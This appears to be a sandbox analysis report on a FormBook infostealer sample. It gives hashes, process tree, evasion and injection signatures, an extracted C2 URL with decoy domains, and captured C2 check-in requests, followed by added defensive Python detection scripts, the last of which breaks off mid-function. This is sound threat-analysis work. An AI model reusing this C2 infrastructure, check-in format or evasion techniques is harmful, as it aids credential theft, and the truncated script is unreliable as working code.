Windows Analysis Report divpCHa0h7.exe

Overview

General Information

Sample Name: divpCHa0h7.exe
Analysis ID: 502315
MD5: fda0d823b262ac2b1bd76a2053c29692
SHA1: 73f72d7c987d44d1f236c138c5617b527c5ba340
SHA256: 91a166f9a29ad832c9640078210a47e5afa928ab1a79a7b40d3b358e9c8bc5d5
Tags: exe
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • divpCHa0h7.exe (PID: 3240 cmdline: 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 5712 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 4132 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
    • divpCHa0h7.exe (PID: 2256 cmdline: C:\Users\user\Desktop\divpCHa0h7.exe MD5: FDA0D823B262AC2B1BD76A2053C29692)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • msdt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
        • cmd.exe (PID: 6732 cmdline: /c del 'C:\Users\user\Desktop\divpCHa0h7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(27 entries in total; the remainder is not shown here)

Note: $sequence_0 (03 C8 0F 31 2B C1 89 45 FC) disassembles to add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax, the timing measurement behind the "Tries to detect virtualization through RDTSC time measurements" signature above. The three JPCERT strings are push imm32 instructions (opcode 68) whose immediates the rule labels as the sqlite3 step/text/blob references, consistent with FormBook locating sqlite3 functions by hash rather than by import name.

Unpacked PEs

Source: 5.2.divpCHa0h7.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
    • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
    • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
    • 0x15d18:$sqlite3text: 68 38 2A 90 C5
    • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
    • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack
  Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
  Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0xcd2c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xcd662:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xf50e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xf5482:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0xd9375:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x101195:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0xd8e61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x100c81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0xd9477:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x101297:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0xd95ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x10140f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xce07a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0xf5e9a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0xd80dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xffefc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xcedf2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0xf6c12:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0xde867:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x106687:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xdf90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(14 entries in total; the remainder is not shown here)

          Sigma Overview

          System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started, Author: juju4, Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\divpCHa0h7.exe, ParentImage: C:\Users\user\Desktop\divpCHa0h7.exe, ParentProcessId: 2256, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 6440
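The Sigma event above records only the msdt.exe start; the process tree earlier on this page shows the whole chain (the sample starting its own image three times, msdt.exe started from a binary under the user profile, and cmd.exe deleting the original file). The following Python is an added example and not part of the Joe Sandbox report: it turns those three behaviours into checks over process-creation events constructed from the tree. The parent of the first divpCHa0h7.exe instance, the full path of cmd.exe, the field names, and the LOLBIN list are this example's assumptions; in production the events would come from Sysmon Event ID 1 or Security event 4688.

```python
"""Process-chain checks for the behaviour shown in the report above.

Added example, not part of the Joe Sandbox report. Events are constructed
from the process tree on this page; the parent of the first sample instance
and the full path of cmd.exe are assumptions (the report shows neither).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the started process (Sysmon "Image")
    cmdline: str    # Sysmon "CommandLine"


SAMPLE = r"C:\Users\user\Desktop\divpCHa0h7.exe"

# Constructed from the report's process tree (PIDs as listed there).
EVENTS = [
    ProcEvent(3472, 0, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE"),   # ppid assumed
    ProcEvent(3240, 3472, SAMPLE, f"'{SAMPLE}'"),                                 # parent assumed
    ProcEvent(5712, 3240, SAMPLE, SAMPLE),
    ProcEvent(4132, 3240, SAMPLE, SAMPLE),
    ProcEvent(2256, 3240, SAMPLE, SAMPLE),
    ProcEvent(6440, 2256, r"C:\Windows\SysWOW64\msdt.exe", r"C:\Windows\SysWOW64\msdt.exe"),
    ProcEvent(6732, 6440, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),  # cmd.exe path assumed
    ProcEvent(6760, 6732, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# Signed system binaries whose start from a user-profile parent is suspicious.
# msdt.exe is the one that fired the Sigma rule on this page; extend as needed.
LOLBINS = {"msdt.exe"}

USER_PATH_PREFIX = "c:\\users\\"
DEL_RE = re.compile(r"""\bdel\b\s+["']?(?P<path>[^"']+?)["']?\s*$""", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(ev: ProcEvent, by_pid: dict):
    """Yield parent, grandparent, ... of ev (stops on unknown or cyclic PIDs)."""
    seen = {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)


def detect(events) -> list:
    """Return (rule, pid) findings in event order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        parent = by_pid.get(ev.ppid)

        # 1. A process starting a copy of its own image; seen three times here,
        #    matching the suspended-process / hollowing signatures in the report.
        if parent is not None and parent.image.lower() == ev.image.lower():
            findings.append(("self_spawn", ev.pid))

        # 2. A user-profile binary starting a system LOLBin: the Sigma
        #    "Possible Applocker Bypass" hit (divpCHa0h7.exe -> msdt.exe).
        if (parent is not None and basename(ev.image) in LOLBINS
                and parent.image.lower().startswith(USER_PATH_PREFIX)):
            findings.append(("lolbin_from_user_path", ev.pid))

        # 3. cmd.exe deleting the image of one of its own ancestors: the
        #    "Self deletion via cmd delete" signature.
        if basename(ev.image) == "cmd.exe":
            m = DEL_RE.search(ev.cmdline)
            if m:
                target = m.group("path").strip().lower()
                if any(a.image.lower() == target for a in ancestors(ev, by_pid)):
                    findings.append(("self_delete", ev.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:22s} pid={pid}")
```

The self-delete check walks the ancestry rather than only the direct parent because, as the tree shows, the deletion is issued two hops away (sample -> msdt.exe -> cmd.exe); a parent-only rule would miss it.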

          Jbx Signature Overview

          AV Detection:

Found malware configuration
Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
Multi AV Scanner detection for submitted file
Source: divpCHa0h7.exe, VirusTotal: Detection: 16%
Source: divpCHa0h7.exe, ReversingLabs: Detection: 17%
Yara detected FormBook
Source: Yara match, File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
Source: 5.2.divpCHa0h7.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.1.divpCHa0h7.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: divpCHa0h7.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: divpCHa0h7.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msdt.pdbGCTL source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: divpCHa0h7.exe, 00000005.00000002.362382961.0000000000EF0000.00000040.00000001.sdmp, msdt.exe, 0000000F.00000002.521663389.0000000004BBF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: divpCHa0h7.exe, msdt.exe
Source: Binary string: msdt.pdb source: divpCHa0h7.exe, 00000005.00000002.364340178.0000000002E40000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\divpCHa0h7.exe, Code function: 4x nop then pop ebx, 5_2_00406AB9
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 4x nop then pop ebx, 15_2_02766AB9

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49768 -> 104.165.34.6:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49789 -> 108.167.135.122:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49812 -> 8.212.24.67:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74:80
Source: C:\Windows\explorer.exe, Network Connect: 81.169.145.161:80
Source: C:\Windows\explorer.exe, Domain query: www.mambacustomboats.com
Source: C:\Windows\explorer.exe, Domain query: www.sanlifalan.com
Source: C:\Windows\explorer.exe, Domain query: www.esyscoloradosprings.com
Source: C:\Windows\explorer.exe, Network Connect: 104.165.34.6:80
Source: C:\Windows\explorer.exe, Network Connect: 108.167.135.122:80
Source: C:\Windows\explorer.exe, Network Connect: 64.190.62.111:80
Source: C:\Windows\explorer.exe, Domain query: www.ribbonofficial.com
Source: C:\Windows\explorer.exe, Domain query: www.floaterslaser.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.esyscoloradosprings.com/fqiq/
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1
  Host: www.ribbonofficial.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all NUL bytes)
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
  Host: www.sanlifalan.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all NUL bytes)
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1
  Host: www.floaterslaser.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all NUL bytes)
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
  Host: www.mambacustomboats.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all NUL bytes)
Source: global traffic, HTTP traffic detected:
  GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
  Host: www.esyscoloradosprings.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty, all NUL bytes)
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 403 Forbidden
  Date: Wed, 13 Oct 2021 17:47:34 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  X-Sorting-Hat-PodId: 216
  X-Sorting-Hat-ShopId: 59389116584
  X-Dc: gcp-europe-west1
  X-Request-ID: cecbddb8-e852-4c90-927e-af3e5555f963
  X-Content-Type-Options: nosniff
  X-Permitted-Cross-Domain-Policies: none
  X-XSS-Protection: 1; mode=block
  X-Download-Options: noopen
  CF-Cache-Status: DYNAMIC
  Server: cloudflare
  CF-RAY: 69da64d2c8f74303-FRA
  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
  Body (decoded from the raw bytes; chunk size 0x141d, capture truncated): <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> ... (the rest of the captured chunk is the page's stylesheet)
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 13 Oct 2021 17:47:45 GMT
  Server: Apache/2.4.51 (Unix)
  Content-Length: 196
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Body (decoded from the raw bytes): <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 503 Service Unavailable
  Content-Type: text/html; charset=UTF-8
  Content-Length: 884
  Connection: close
  P3P: CP="CAO PSA OUR"
  Expires: Thu, 01 Jan 1970 00:00:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Pragma: no-cache
  Body (decoded from the raw bytes): <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; } </style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b>  </p></div></body></html>

Note: the 503 body is a "Virus/Spyware Download Blocked" policy page from a filtering device in the path, not a reply generated by a FormBook C2 application, and the report does not record which of the five requests drew which of the three responses; treat the response codes as evidence of reachability only, not of C2 liveness.
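The five GET requests above share the shape the ET rules fire on: a GET with a seven-NUL-byte body, no User-Agent, Connection: close, and a query of two four-character parameters, sent to the real C2 host from the configuration and to several decoy domains from the same configuration. The Python below is an added example, not part of the Joe Sandbox report: it re-assembles those five requests as raw HTTP (constructed from the lines above), labels each host as C2 or decoy against the extracted configuration (decoy list trimmed to a few entries), and extracts the query pair that is constant across all five. The trait names are this example's own; the report does not state which alert IP belongs to which host, so no such mapping is made.

```python
"""Classify the captured FormBook check-ins against the extracted config.

Added example, not part of the Joe Sandbox report. Requests and config are
constructed from the "HTTP traffic detected" and "Malware Configuration"
entries on this page (decoy list shortened); trait names are this example's.
"""
import re

# From the report's extracted configuration (decoy list trimmed).
CONFIG = {
    "C2 list": ["www.esyscoloradosprings.com/fqiq/"],
    "decoy": ["driventow.com", "ipatchwork.today", "sanlifalan.com", "floaterslaser.com",
              "mambacustomboats.com", "ribbonofficial.com"],
}

# The five requests from the report, re-assembled as raw HTTP (7 NUL bytes body).
NUL7 = b"\x00" * 7
RAW_REQUESTS = [
    b"GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1\r\nHost: www.ribbonofficial.com\r\nConnection: close\r\n\r\n" + NUL7,
    b"GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1\r\nHost: www.sanlifalan.com\r\nConnection: close\r\n\r\n" + NUL7,
    b"GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1\r\nHost: www.floaterslaser.com\r\nConnection: close\r\n\r\n" + NUL7,
    b"GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1\r\nHost: www.mambacustomboats.com\r\nConnection: close\r\n\r\n" + NUL7,
    b"GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1\r\nHost: www.esyscoloradosprings.com\r\nConnection: close\r\n\r\n" + NUL7,
]


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request parser: request line, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
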